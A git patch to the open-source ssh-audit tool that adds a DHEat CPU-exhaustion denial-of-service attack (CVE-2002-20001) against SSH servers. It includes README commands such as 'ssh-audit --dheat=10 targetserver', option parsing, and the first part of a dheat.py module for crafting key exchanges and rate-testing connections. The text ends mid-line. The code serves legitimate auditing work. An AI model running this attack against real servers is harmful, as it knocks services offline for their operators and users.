From 8190fe59d07224ae1a6109098255b3c043f74bda Mon Sep 17 00:00:00 2001 From: Joe Testa Date: Thu, 18 Apr 2024 13:58:13 -0400 Subject: [PATCH] Added implementation for DHEat denial-of-service attack (CVE-2002-20001). (#211, #217) --- README.md | 34 + docker_test.sh | 4 +- src/ssh_audit/auditconf.py | 97 +- src/ssh_audit/dheat.py | 1002 +++++++++++++++++ src/ssh_audit/ssh_audit.py | 77 +- ssh-audit.1 | 57 +- ssh-audit.py | 17 +- test/conftest.py | 7 + .../dropbear_2019.78_test1.json | 4 +- .../expected_results/openssh_4.0p1_test1.json | 4 +- .../expected_results/openssh_5.6p1_test1.json | 4 +- .../expected_results/openssh_5.6p1_test2.json | 4 +- .../expected_results/openssh_5.6p1_test3.json | 4 +- .../expected_results/openssh_5.6p1_test4.json | 4 +- .../expected_results/openssh_5.6p1_test5.json | 4 +- .../expected_results/openssh_8.0p1_test1.json | 4 +- .../expected_results/openssh_8.0p1_test2.json | 4 +- .../expected_results/openssh_8.0p1_test3.json | 4 +- .../tinyssh_20190101_test1.json | 4 +- test/test_dheater.py | 29 + test/test_errors.py | 1 + test/test_ssh1.py | 1 + test/test_ssh2.py | 1 + tox.ini | 3 + 24 files changed, 1313 insertions(+), 61 deletions(-) create mode 100644 src/ssh_audit/dheat.py create mode 100644 test/test_dheater.py diff --git a/README.md b/README.md index 5a630c8..5e4425f 100644 --- a/README.md +++ b/README.md @@ -48,7 +48,22 @@ usage: ssh-audit.py [options] -c, --client-audit starts a server on port 2222 to audit client software config (use -p to change port; use -t to change timeout) + --conn-rate-test=N[:max_rate] perform a connection rate test (useful + for collecting metrics related to + susceptibility of the DHEat vuln). + Testing is conducted with N concurrent + sockets with an optional maximum rate + of connections per second. -d, --debug Enable debug output. + --dheat=N[:kex[:e_len]] continuously perform the DHEat DoS attack + (CVE-2002-20001) against the target using N + concurrent sockets. Optionally, a specific + key exchange algorithm can be specified + instead of allowing it to be automatically + chosen. Additionally, a small length of + the fake e value sent to the server can + be chosen for a more efficient attack (such + as 4). -g, --gex-test= dh gex modulus size test @@ -68,6 +83,9 @@ usage: ssh-audit.py [options] -p, --port= port to connect -P, --policy=<"policy name" | policy.txt> run a policy test using the specified policy + --skip-rate-test skip the connection rate test during standard audits + (used to safely infer whether the DHEat attack + is viable) -t, --timeout= timeout (in seconds) for connection and reading (default: 5) -T, --targets= a file containing a list of target hosts (one @@ -132,6 +150,21 @@ To create a policy based on a target server (which can be manually edited): ssh-audit -M new_policy.txt targetserver ``` +To run the DHEat CPU exhaustion DoS attack ([CVE-2002-20001](https://nvd.nist.gov/vuln/detail/CVE-2002-20001)) against a target using 10 concurrent sockets: +``` +ssh-audit --dheat=10 targetserver +``` + +To run the DHEat attack using the `diffie-hellman-group-exchange-sha256` key exchange algorithm: +``` +ssh-audit --dheat=10:diffie-hellman-group-exchange-sha256 targetserver +``` + +To run the DHEat attack using the `diffie-hellman-group-exchange-sha256` key exchange algorithm along with very small but non-standard packet lengths (this may result in the same CPU exhaustion, but with many less bytes per second being sent): +``` +ssh-audit --dheat=10:diffie-hellman-group-exchange-sha256:4 targetserver +``` + ## Screenshots ### Server Standard Audit Example @@ -181,6 +214,7 @@ For convenience, a web front-end on top of the command-line tool is available at ## ChangeLog ### v3.2.0-dev (???) + - Added implementation of the DHEat denial-of-service attack (see `--dheat` option; [CVE-2002-20001](https://nvd.nist.gov/vuln/detail/CVE-2002-20001)). - Expanded filter of CBC ciphers to flag for the Terrapin vulnerability. It now includes more rarely found ciphers. - Color output is disabled if the `NO_COLOR` environment variable is set (see https://no-color.org/). - Fixed parsing of `ecdsa-sha2-nistp*` CA signatures on host keys. Additionally, they are now flagged as potentially back-doored, just as standard host keys are. diff --git a/docker_test.sh b/docker_test.sh index 3c14ef0..630d389 100755 --- a/docker_test.sh +++ b/docker_test.sh @@ -464,7 +464,7 @@ run_test() { exit 1 fi - ./ssh-audit.py localhost:2222 > "$test_result_stdout" + ./ssh-audit.py --skip-rate-test localhost:2222 > "$test_result_stdout" actual_retval=$? if [[ $actual_retval != "$expected_retval" ]]; then echo -e "${REDB}Unexpected return value. Expected: ${expected_retval}; Actual: ${actual_retval}${CLR}" @@ -478,7 +478,7 @@ run_test() { exit 1 fi - ./ssh-audit.py -jj localhost:2222 > "$test_result_json" + ./ssh-audit.py --skip-rate-test -jj localhost:2222 > "$test_result_json" actual_retval=$? if [[ $actual_retval != "$expected_retval" ]]; then echo -e "${REDB}Unexpected return value. Expected: ${expected_retval}; Actual: ${actual_retval}${CLR}" diff --git a/src/ssh_audit/auditconf.py b/src/ssh_audit/auditconf.py index e2994a6..bb3437c 100644 --- a/src/ssh_audit/auditconf.py +++ b/src/ssh_audit/auditconf.py @@ -1,7 +1,7 @@ """ The MIT License (MIT) - Copyright (C) 2017-2021 Joe Testa (jtesta@positronsecurity.com) + Copyright (C) 2017-2024 Joe Testa (jtesta@positronsecurity.com) Copyright (C) 2017 Andris Raugulis (moo@arthepsy.eu) Permission is hereby granted, free of charge, to any person obtaining a copy @@ -60,10 +60,20 @@ class AuditConf: self.manual = False self.debug = False self.gex_test = '' + self.dheat: Optional[str] = None + self.dheat_concurrent_connections: int = 0 + self.dheat_e_length: int = 0 + self.dheat_target_alg: str = "" + self.skip_rate_test = False + self.conn_rate_test: str = "1:1" + self.conn_rate_test_enabled = False + self.conn_rate_test_threads = 0 + self.conn_rate_test_target_rate = 0 + def __setattr__(self, name: str, value: Union[str, int, float, bool, Sequence[int]]) -> None: valid = False - if name in ['batch', 'client_audit', 'colors', 'json', 'json_print_indent', 'list_policies', 'manual', 'make_policy', 'ssh1', 'ssh2', 'timeout_set', 'verbose', 'debug']: + if name in ['batch', 'client_audit', 'colors', 'json', 'json_print_indent', 'list_policies', 'manual', 'make_policy', 'ssh1', 'ssh2', 'timeout_set', 'verbose', 'debug', 'skip_rate_test']: valid, value = True, bool(value) elif name in ['ipv4', 'ipv6']: valid, value = True, bool(value) @@ -94,6 +104,89 @@ class AuditConf: if num_threads < 1: raise ValueError('invalid number of threads: {}'.format(value)) value = num_threads + elif name == "dheat": + # Valid values: + # * None + # * "10" (concurrent-connections) + # * "10:diffie-hellman-group18-sha512" (concurrent-connections:target-alg) + # * "10:diffie-hellman-group18-sha512:100" (concurrent-connections:target-alg:e-length) + valid = True + if value is not None: + + def _parse_concurrent_connections(s: str) -> int: + if Utils.parse_int(s) < 1: + raise ValueError("number of concurrent connections must be 1 or greater: {}".format(s)) + return int(s) + + def _parse_e_length(s: str) -> int: + s_int = Utils.parse_int(s) + if s_int < 2: + raise ValueError("length of e must not be less than 2: {}".format(s)) + return s_int + + def _parse_target_alg(s: str) -> str: + if len(s) == 0: + raise ValueError("target algorithm must not be the empty string.") + return s + + value = str(value) + fields = value.split(':') + + self.dheat_concurrent_connections = _parse_concurrent_connections(fields[0]) + + # Parse the target algorithm if present. + if len(fields) >= 2: + self.dheat_target_alg = _parse_target_alg(fields[1]) + + # Parse the length of e, if present. + if len(fields) == 3: + self.dheat_e_length = _parse_e_length(fields[2]) + + if len(fields) > 3: + raise ValueError("only three fields are expected instead of {}: {}".format(len(fields), value)) + + elif name in ["dheat_concurrent_connections", "dheat_e_length"]: + valid = True + if not isinstance(value, int): + valid = False + + elif name == "dheat_target_alg": + valid = True + if not isinstance(value, str): + valid = False + + elif name == "conn_rate_test": + # Valid values: + # * "4" (run rate test with 4 threads) + # * "4:100" (run rate test with 4 threads, targeting 100 connections/second) + + error_msg = "valid format for {:s} is \"N\" or \"N:N\", where N is an integer.".format(name) + self.conn_rate_test_enabled = True + fields = str(value).split(":") + + if len(fields) > 2 or len(fields) == 0: + raise ValueError(error_msg) + else: + self.conn_rate_test_threads = int(fields[0]) + if self.conn_rate_test_threads < 1: + raise ValueError("number of threads must be 1 or greater.") + + self.conn_rate_test_target_rate = 0 + if len(fields) == 2: + self.conn_rate_test_target_rate = int(fields[1]) + if self.conn_rate_test_target_rate < 1: + raise ValueError("rate target must be 1 or greater.") + + elif name == "conn_rate_test_enabled": + valid = True + if not isinstance(value, bool): + valid = False + + elif name in ["conn_rate_test_threads", "conn_rate_test_target_rate"]: + valid = True + if not isinstance(value, int): + valid = False + if valid: object.__setattr__(self, name, value) diff --git a/src/ssh_audit/dheat.py b/src/ssh_audit/dheat.py new file mode 100644 index 0000000..034faa7 --- /dev/null +++ b/src/ssh_audit/dheat.py @@ -0,0 +1,1002 @@ +""" + The MIT License (MIT) + + Copyright (C) 2023-2024 Joe Testa (jtesta@positronsecurity.com) + + Permission is hereby granted, free of charge, to any person obtaining a copy + of this software and associated documentation files (the "Software"), to deal + in the Software without restriction, including without limitation the rights + to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + copies of the Software, and to permit persons to whom the Software is + furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + THE SOFTWARE. +""" +import multiprocessing +import os +import queue +import random +import select +import socket +import struct +import time +import traceback + +from typing import Any, Dict, List, Optional, Tuple + +from ssh_audit.auditconf import AuditConf +from ssh_audit.banner import Banner +from ssh_audit import exitcodes +from ssh_audit.gextest import GEXTest +from ssh_audit.globals import SSH_HEADER +from ssh_audit.ssh_socket import SSH_Socket +from ssh_audit.ssh2_kex import SSH2_Kex +from ssh_audit.outputbuffer import OutputBuffer +from ssh_audit.writebuf import WriteBuf + + +class DHEat: + + # Maximum number of connections per second the server can allow until a warning is issued when Diffie-Hellman algorithms are supported. + MAX_SAFE_RATE = 20.0 + + # The warning added to DH algorithms in the UI when dh_rate_test determines that no throttling is being done. + DHEAT_WARNING = "Potentially insufficient connection throttling detected, resulting in possible vulnerability to the DHEat DoS attack (CVE-2002-20001). Either connection throttling or removal of Diffie-Hellman key exchanges is necessary to remediate this issue. Suppress this test/message with --skip-rate-test. Additional info: {connections:d} connections were created in {time_elapsed:.3f} seconds, or {rate:.1f} conns/sec; server must respond with a rate less than {max_safe_rate:.1f} conns/sec to be considered safe." + + # List of the Diffie-Hellman group exchange algorithms this test supports. + gex_algs = [ + "diffie-hellman-group-exchange-sha256", # Implemented in OpenSSH. + "diffie-hellman-group-exchange-sha1", # Implemented in OpenSSH. + "diffie-hellman-group-exchange-sha224@ssh.com", + "diffie-hellman-group-exchange-sha256@ssh.com", + "diffie-hellman-group-exchange-sha384@ssh.com", + "diffie-hellman-group-exchange-sha512@ssh.com", + ] + + # List of key exchange algorithms, sorted by largest modulus size. + alg_priority = [ + "diffie-hellman-group18-sha512", # Implemented in OpenSSH. + "diffie-hellman-group18-sha512@ssh.com", + "diffie-hellman-group17-sha512", + "diffie-hellman_group17-sha512", # Note that this is not the same as the one above it. + "diffie-hellman-group16-sha512", # Implemented in OpenSSH. + "diffie-hellman-group16-sha256", + "diffie-hellman-group16-sha384@ssh.com", + "diffie-hellman-group16-sha512", + "diffie-hellman-group16-sha512@ssh.com", + "diffie-hellman-group15-sha256", + "diffie-hellman-group15-sha256@ssh.com", + "diffie-hellman-group15-sha384@ssh.com", + "diffie-hellman-group15-sha512", + "diffie-hellman-group14-sha256", # Implemented in OpenSSH. + "diffie-hellman-group14-sha1", # Implemented in OpenSSH. + "diffie-hellman-group14-sha224@ssh.com", + "diffie-hellman-group14-sha256@ssh.com", + "diffie-hellman-group1-sha1", # Implemented in OpenSSH. + "diffie-hellman-group1-sha256", + "curve25519-sha256", # Implemented in OpenSSH. + "curve25519-sha256@libssh.org", # Implemented in OpenSSH. + "ecdh-sha2-nistp256", # Implemented in OpenSSH. + "ecdh-sha2-nistp384", # Implemented in OpenSSH. + "ecdh-sha2-nistp521", # Implemented in OpenSSH. + "sntrup761x25519-sha512@openssh.com", # Implemented in OpenSSH. + ] + + # Dictionary of key exchanges mapped to their modulus size. + alg_modulus_sizes = { + "diffie-hellman-group18-sha512": 8192, + "diffie-hellman-group18-sha512@ssh.com": 8192, + "diffie-hellman-group17-sha512": 6144, + "diffie-hellman_group17-sha512": 6144, + "diffie-hellman-group16-sha512": 4096, + "diffie-hellman-group16-sha256": 4096, + "diffie-hellman-group16-sha384@ssh.com": 4096, + "diffie-hellman-group16-sha512@ssh.com": 4096, + "diffie-hellman-group15-sha256": 3072, + "diffie-hellman-group15-sha256@ssh.com": 3072, + "diffie-hellman-group15-sha384@ssh.com": 3072, + "diffie-hellman-group15-sha512": 3072, + "diffie-hellman-group14-sha256": 2048, + "diffie-hellman-group14-sha1": 2048, + "diffie-hellman-group14-sha224@ssh.com": 2048, + "diffie-hellman-group14-sha256@ssh.com": 2048, + "diffie-hellman-group1-sha1": 1024, + "diffie-hellman-group1-sha256": 1024, + "curve25519-sha256": (31 * 8), + "curve25519-sha256@libssh.org": (31 * 8), + "ecdh-sha2-nistp256": (64 * 8), + "ecdh-sha2-nistp384": (96 * 8), + "ecdh-sha2-nistp521": (132 * 8), + "sntrup761x25519-sha512@openssh.com": (1189 * 8), + } + + # List of DH algorithms that have been validated by the maintainer. There is quite the long list of DH algorithms available (see above), and testing them all would require a lot of time as many are not implemented in OpenSSH. So perhaps the community can help with testing... + tested_algs = ["diffie-hellman-group18-sha512", "diffie-hellman-group16-sha512", "diffie-hellman-group-exchange-sha256", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "curve25519-sha256", "curve25519-sha256@libssh.org", "sntrup761x25519-sha512@openssh.com"] + + # If a DH algorithm is used that is not in the tested_algs list, above, then write this notice to the user. + untested_alg_notice = "{color_start:s}NOTE:{color_end:s} the target DH algorithm ({dh_alg:s}) has not been tested by the maintainer. If you can verify that the server's CPU is fully utilized, please copy/paste this output to jtesta@positronsecurity.com." + + # Hardcoded ECDH ephemeral public keys for NIST-P256, NIST-P384, and NIST-P521. These need to lie on the ellipical curve in order to be accepted by the server, so generating them quickly isn't easy without an external crypto library. So we'll just use some hardcoded ones. + HARDCODED_NISTP256 = b"\x04\x9d\x32\xad\x75\x68\xc3\x43\x30\x12\x1b\x64\x5d\x12\x3e\x18\x7b\xd2\x5a\xd6\x42\x6b\xb5\xab\xa3\x16\xda\x64\xe7\x15\x22\xd2\x66\xae\xcb\xcc\x9c\x64\x57\x32\x76\x41\x74\xeb\xff\xda\x28\xd6\x6e\x10\x98\x60\x56\x74\x30\x37\x97\xd2\x7f\x29\xd9\x99\xf1\x58\x8a" + HARDCODED_NISTP384 = b"\x04\x94\xd9\xd2\x49\xac\xb6\x23\x59\x47\x32\x50\x5f\xaf\x55\x6e\x7a\x4a\x00\x82\xd9\xb1\x4c\xe4\x61\x05\x70\x91\x99\x19\xbe\x84\x2d\x3a\x74\x7c\xd8\xd1\xc1\x1a\x5c\xbf\xd3\x33\xcb\x25\x51\x1c\x66\x76\x53\x04\x92\x4f\xb3\x1f\x9b\x19\xba\x6b\x1a\xe2\x91\x04\xc6\x4c\x9c\xec\xa9\x43\xd0\x2e\x08\x4b\x2a\x50\xcf\x31\x46\xb3\x6c\x29\xd0\xf1\x26\x9e\x57\x17\xe1\xf8\x29\xce\xb5\x9a\x96\x2b\x94" + HARDCODED_NISTP521 = b"\x04\x00\x51\xb7\xf4\x51\x54\x7c\x60\xd9\xe8\x90\x8f\x40\xcd\x05\x7e\x75\xcf\xfc\x3b\xe8\xa6\x45\x8b\xe3\xb5\x99\x75\xf6\x42\xef\x34\x5a\x9a\x86\x90\x43\x52\x62\x49\xd9\x62\x50\xc0\xb7\xdd\xe0\x34\x2e\x25\x3f\x3e\x1f\x19\xdd\xf5\xc9\x11\xe4\x6f\xd0\xe2\x59\x86\xc3\x7b\x01\xd3\xf7\x5a\x28\x72\x73\x3c\x7e\x4d\x8f\x08\x2a\x70\x94\x93\x83\xe2\xed\xf2\xd6\xf6\x3e\x63\xb8\xb9\xaa\x83\x2a\xd3\x96\xca\xde\x38\x62\x19\x1e\x84\x84\xad\xfe\x06\xfc\x2b\xb2\x1b\x79\x63\xfc\x1e\x6d\x85\x14\xba\x3c\x64\xd9\x64\x75\xd5\x74\xcb\x5b\x3d\xc3\x9f" + + # Algorithms that must use hard-coded e values. + HARDCODED_ALGS = ["ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521"] + + # Post-quantum algorithms matched with traditional crypto. + COMPLEX_PQ_ALGS = ["sntrup761x25519-sha512@openssh.com"] + + CLEAR = "" + BLUEB = "" + GREENB = "" + PURPLEB = "" + REDB = "" + WHITEB = "" + YELLOWB = "" + BAR_CHART = " " + CHART_UPWARDS = " " + + def __init__(self, out: 'OutputBuffer', aconf: 'AuditConf', banner: Optional['Banner'], kex: 'SSH2_Kex') -> None: + self.out = out + self.target = aconf.host + self.port = aconf.port + + # We'll use the server's banner as our own. Otherwise, use ssh-audit's default. + self.banner = SSH_HEADER.format("2.0").encode("utf-8") + b"\r\n" + if banner is not None: + self.banner = str(banner).encode("utf-8") + b"\r\n" + + # The SSH2_Kex object that we recieved from the server in a prior connection. We'll use it as a template to craft our own kex. + self.kex = kex + + # The connection and read timeouts. + self.connect_timeout = aconf.timeout + self.read_timeout = aconf.timeout + + # True when we are in debug mode. + self.debug_mode = aconf.debug + + # The length of our fake e value to give to the server. It is automatically set based on the DH modulus size we are targeting, or by the user for advanced testing. + self.e_rand_len = 0 + + # The SSH Key Exchange Init message. This is the same for each connection (minus the random 16-byte cookie field, so it will be pre-computed to save time. + self.kex_init_body = b'' + + # Disable buffered output. + self.out.buffer_output = False + + # We'll use a weak/fast PRNG to generate the most significant byte of our fake e response to the server. + random.seed() + + # Attack statistics. + self.num_attempted_tcp_connections = 0 + self.num_successful_tcp_connections = 0 + self.num_successful_dh_kex = 0 + self.num_failed_dh_kex = 0 + self.num_bytes_written = 0 + self.num_connect_timeouts = 0 + self.num_read_timeouts = 0 + self.num_socket_exceptions = 0 + self.num_openssh_throttled_connections = 0 + + # The time we started the attack. + self.start_timer = 0.0 + + # The number of concurrent sockets to open with the server. + self.concurrent_connections = 10 + + # The key exchange algorithm name that we are targeting on the server. If empty, we will choose the best available option. Otherwise, it is set by the user. + self.target_kex = "" + + self.user_set_e_len = False + self.send_all_packets_at_once = False + if aconf.dheat is not None: + self.concurrent_connections = aconf.dheat_concurrent_connections + self.target_kex = aconf.dheat_target_alg + + # If the user specified a length of e to use instead of the correct length determined at run-time. + if aconf.dheat_e_length > 0: + self.send_all_packets_at_once = True # If the user specified the e length (which is non-standard), we'll also send all SSH packets at once to reduce latency (which is also non-standard). This involves sending the banner, KEX INIT, DH KEX INIT all in the same packet without waiting for the server to respond to them individually. + self.user_set_e_len = True + self.e_rand_len = aconf.dheat_e_length + + # User wants to perform a rate test. + self.rate_test = False + self.target_rate = 0 # When performing a rate test, this is the number of successful connections per second we are targeting. 0=no rate limit. + if aconf.conn_rate_test_enabled: + self.rate_test = True + self.concurrent_connections = aconf.conn_rate_test_threads + self.target_rate = aconf.conn_rate_test_target_rate + + # Set the color flags & emjojis, if applicable. + if aconf.colors: + DHEat.CLEAR = "\033[0m" + DHEat.WHITEB = "\033[1;97m" + DHEat.BLUEB = "\033[1;94m" # Blue + bold + DHEat.PURPLEB = "\033[1;95m" # Purple + bold + DHEat.YELLOWB = "\033[1;93m" # Yellow + bold + DHEat.GREENB = "\033[1;92m" # Green + bold + DHEat.REDB = "\033[1;91m" # Red + bold + DHEat.BAR_CHART = "\U0001F4CA" # The bar chart emoji. + DHEat.CHART_UPWARDS = "\U0001F4C8" # The upwards chart emoji. + + + @staticmethod + def add_byte_units(n: float) -> str: + '''Converts a number of bytes to a human-readable representation (i.e.: 10000 -> "9.8KB").''' + + if n >= 1073741824: + return "%.1fGB" % (n / 1073741824) + if n >= 1048576: + return "%.1fMB" % (n / 1048576) + if n >= 1024: + return "%.1fKB" % (n / 1024) + + return "%u bytes" % n + + + def analyze_gex(self, server_gex_alg: str) -> int: + '''Analyzes a server's Diffie-Hellman group exchange algorithm. The largest modulus it supports is determined, then it is inserted into DHEat.alg_priority list while maintaining order by largest modulus. The largest modulus is also returned.''' + + self.output("Analyzing server's group exchange algorithm, %s, to find largest modulus it supports..." % (server_gex_alg)) + + largest_bit_modulus = 0 + try: + largest_bit_modulus = self.get_largest_gex_modulus(server_gex_alg) + except Exception: + # On exception, simply print the stack trace and continue on. + traceback.print_exc() + + if largest_bit_modulus > 0: + DHEat.alg_modulus_sizes[server_gex_alg] = largest_bit_modulus + self.debug("GEX algorithm [%s] supports a max modulus of %u bits." % (server_gex_alg, largest_bit_modulus)) + + # Now that we have the largest modulus for this GEX, insert it into the prioritized list of algorithms. If, say, there are three 8192-bit kex algorithms in the list, we'll insert it as the 4th entry, as plain KEX algorithms require less network activity to trigger than GEX. + i = 0 + inserted = False + while i < len(DHEat.alg_priority): + prioritized_alg = DHEat.alg_priority[i] + prioritized_alg_size = DHEat.alg_modulus_sizes[prioritized_alg] + if largest_bit_modulus > prioritized_alg_size + 1: # + 1 to ensure algs with equal number of bits keep priority over this GEX. + DHEat.alg_priority.insert(i, server_gex_alg) + inserted = True + self.debug("Inserted %s into prioritized algorithm list at index %u: [%s]" % (server_gex_alg, i, ", ".join(DHEat.alg_priority))) + break + + i += 1 + + # Handle the case where all existing algs have a larger modulus. + if inserted is False: + DHEat.alg_priority.append(server_gex_alg) + self.debug("Appended %s to end of prioritized algorithm list: [%s]" % (server_gex_alg, ", ".join(DHEat.alg_priority))) + + self.output("The largest modulus supported by %s appears to be %u." % (server_gex_alg, largest_bit_modulus)) + return largest_bit_modulus + + + def debug(self, s: str) -> None: + '''Prints a string to the console when debugging mode is enabled.''' + + self.out.d(s) + + + @staticmethod + def dh_rate_test(out: 'OutputBuffer', aconf: 'AuditConf', kex: 'SSH2_Kex', max_time: float, max_connections: int, concurrent_sockets: int) -> str: + '''Attempts to quickly create many sockets to the target server. This simulates the DHEat attack without causing an actual DoS condition. If a rate greater than MAX_SAFE_RATE is allowed, then a warning string is returned.''' + + # Gracefully handle when the user presses CTRL-C to break the interactive rate test. + ret = "" + try: + ret = DHEat._dh_rate_test(out, aconf, kex, max_time, max_connections, concurrent_sockets) + except KeyboardInterrupt: + print() + + return ret + + + @staticmethod + def _dh_rate_test(out: 'OutputBuffer', aconf: 'AuditConf', kex: 'SSH2_Kex', max_time: float, max_connections: int, concurrent_sockets: int) -> str: + '''Attempts to quickly create many sockets to the target server. This simulates the DHEat attack without causing an actual DoS condition. If a rate greater than MAX_SAFE_RATE is allowed, then a warning string is returned.''' + + def _close_socket(socket_list: List[socket.socket], s: socket.socket) -> None: + try: + s.shutdown(socket.SHUT_RDWR) + s.close() + except OSError: + pass + + socket_list.remove(s) + + + spinner = ["-", "\\", "|", "/"] + spinner_index = 0 + + # If the user passed --conn-rate-test, then we'll perform an interactive rate test against the target. + interactive = False + if aconf.conn_rate_test_enabled: + interactive = True + max_connections = 999999999999999999 + concurrent_sockets = aconf.conn_rate_test_threads + + DHEat.CLEAR = "\033[0m" + DHEat.WHITEB = "\033[1;97m" + DHEat.BLUEB = "\033[1;94m" + + rate_str = "" + if aconf.conn_rate_test_target_rate > 0: + rate_str = " at a max rate of %s%u%s connections per second" % (DHEat.WHITEB, aconf.conn_rate_test_target_rate, DHEat.CLEAR) + + print() + print("Performing non-disruptive rate test against %s[%s]:%u%s with %s%u%s concurrent sockets%s. No Diffie-Hellman requests will be sent." % (DHEat.WHITEB, aconf.host, aconf.port, DHEat.CLEAR, DHEat.WHITEB, concurrent_sockets, DHEat.CLEAR, rate_str)) + print() + + else: # We'll do a non-interactive test as part of a standard audit. + # Ensure that the server supports at least one DH algorithm. Otherwise, this test is pointless. + server_dh_kex = [] + for server_kex in kex.kex_algorithms: + if (server_kex in DHEat.alg_priority) or (server_kex in DHEat.gex_algs): + server_dh_kex.append(server_kex) + + if len(server_dh_kex) == 0: + out.d("Skipping DHEat.dh_rate_test() since server does not support any DH algorithms: [%s]" % ", ".join(kex.kex_algorithms)) + return "" + else: + out.d("DHEat.dh_rate_test(): starting test; parameters: %f seconds, %u max connections, %u concurrent sockets." % (max_time, max_connections, concurrent_sockets)) + + num_attempted_connections = 0 + num_opened_connections = 0 + socket_list: List[socket.socket] = [] + start_timer = time.time() + last_update = start_timer + while True: + + # During non-interactive tests, limit based on time and number of connections. Otherwise, we loop indefinitely until the user presses CTRL-C. + if (interactive is False) and ((time.time() - start_timer) >= max_time) and (num_opened_connections >= max_connections): + break + + # Give the user some interactive feedback. + if interactive: + now = time.time() + if (now - last_update) >= 1.0: + seconds_running = now - start_timer + print("%s%s%s Run time: %s%.1f%s; TCP SYNs: %s%u%s; Compl. conns: %s%u%s; TCP SYNs/sec: %s%.1f%s; Compl. conns/sec: %s%.1f%s \r" % (DHEat.WHITEB, spinner[spinner_index], DHEat.CLEAR, DHEat.WHITEB, seconds_running, DHEat.CLEAR, DHEat.WHITEB, num_attempted_connections, DHEat.CLEAR, DHEat.WHITEB, num_opened_connections, DHEat.CLEAR, DHEat.BLUEB, num_attempted_connections / seconds_running, DHEat.CLEAR, DHEat.BLUEB, num_opened_connections / seconds_running, DHEat.CLEAR), end="") + last_update = now + spinner_index = (spinner_index + 1) % 4 + + # If a max rate per second was specified, calculate the amount of time to sleep so we don't exceed it. + if aconf.conn_rate_test_target_rate > 0: + time_so_far = now - start_timer + current_rate = num_opened_connections / time_so_far + if current_rate > aconf.conn_rate_test_target_rate: + sleep_time = num_opened_connections / (aconf.conn_rate_test_target_rate * time_so_far) + if sleep_time > 0.0: + time.sleep(sleep_time) + + while (len(socket_list) < concurrent_sockets) and (len(socket_list) + num_opened_connections < max_connections): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setblocking(False) + + out.d("Creating socket (%u of %u already exist)..." % (len(socket_list), concurrent_sockets)) + ret = s.connect_ex((aconf.host, aconf.port)) + num_attempted_connections += 1 + if ret in [0, 115]: # Check if connection is successful or EINPROGRESS. + socket_list.append(s) + + rlist, _, elist = select.select(socket_list, [], socket_list, 0.1) + + # For each socket that has something for us to read... + for s in rlist: + buf = b'' + try: + buf = s.recv(8) + except (ConnectionResetError, BrokenPipeError): + _close_socket(socket_list, s) + continue + + # If we received the SSH header, we'll count this as an opened connection. + if buf.startswith(b"SSH-"): + num_opened_connections += 1 + out.d("Number of opened connections: %u (max: %u)." % (num_opened_connections, max_connections)) + + _close_socket(socket_list, s) + + # Since we just closed the socket, ensure its not in the exception list. + if s in elist: + elist.remove(s) + + # Close all sockets that are in the exception state. + for s in elist: + _close_socket(socket_list, s) + + # Close any remaining sockets. + while len(socket_list) > 0: + _close_socket(socket_list, socket_list[0]) + + time_elapsed = time.time() - start_timer + out.d("DHEat.dh_rate_test() results: time elapsed: %f; connections created: %u" % (time_elapsed, num_opened_connections)) + + note = "" + rate = 0.0 + if time_elapsed > 0.0 and num_opened_connections > 0: + rate = num_opened_connections / time_elapsed + out.d("DHEat.dh_rate_test() results: %.1f connections opened per second." % rate) + + # If we were able to open connections at a rate greater than 25 per second, then we need to warn the user. + if rate > DHEat.MAX_SAFE_RATE: + note = DHEat.DHEAT_WARNING.format(connections=num_opened_connections, time_elapsed=time_elapsed, rate=rate, max_safe_rate=DHEat.MAX_SAFE_RATE) + + return note + + + def generate_kex(self, chosen_kex_alg: str) -> None: + '''Generates and sets the Key Exchange Init message we'll send to the server on each connection.''' + + # The kex template we use is the server's own kex returned from an initial connection. We'll only specify the first algorithm in each field for efficiency, since the server already told us it supports them. + wbuf = WriteBuf() + wbuf.write_list([chosen_kex_alg]) + wbuf.write_list([self.kex.key_algorithms[0]] if len(self.kex.key_algorithms) > 0 else []) + wbuf.write_list([self.kex.client.encryption[0]] if len(self.kex.client.encryption) > 0 else []) + wbuf.write_list([self.kex.server.encryption[0]] if len(self.kex.server.encryption) > 0 else []) + wbuf.write_list([self.kex.client.mac[0]] if len(self.kex.client.mac) > 0 else []) + wbuf.write_list([self.kex.server.mac[0]] if len(self.kex.server.mac) > 0 else []) + wbuf.write_list([self.kex.client.compression[0]] if len(self.kex.client.compression) > 0 else []) + wbuf.write_list([self.kex.server.compression[0]] if len(self.kex.server.compression) > 0 else []) + wbuf.write_list([self.kex.client.languages[0]] if len(self.kex.client.languages) > 0 else []) + wbuf.write_list([self.kex.server.languages[0]] if len(self.kex.server.languages) > 0 else []) + wbuf.write_bool(self.kex.follows) + wbuf.write_int(self.kex.unused) + self.kex_init_body = wbuf.write_flush() + + + def get_largest_gex_modulus(self, server_gex_alg: str) -> int: + '''Probes the server for the largest modulus size it supports through group-exchange algorithms.''' + + self.debug("Called get_largest_gex_modulus(%s)." % server_gex_alg) + + ssh_socket = SSH_Socket(self.out, self.target, self.port, timeout=self.connect_timeout, timeout_set=True) + new_kex = SSH2_Kex(self.out, self.kex.cookie, [server_gex_alg], self.kex.key_algorithms, self.kex.client, self.kex.server, False, unused=0) + + # First, let's try a range of ridiculously large bits. This is unlikely to work, but it would make things very interesting if they did! + ret: Dict[str, List[int]] = {} + if GEXTest.granular_modulus_size_test(self.out, ssh_socket, new_kex, 9216, 12288, 16384, ret) == exitcodes.GOOD and server_gex_alg in ret: + + # Check that what the server accepted lies within the range we requested. + accepted_bits = ret[server_gex_alg][0] + if accepted_bits >= 9216: + self.debug("get_largest_gex_modulus(%s) returning 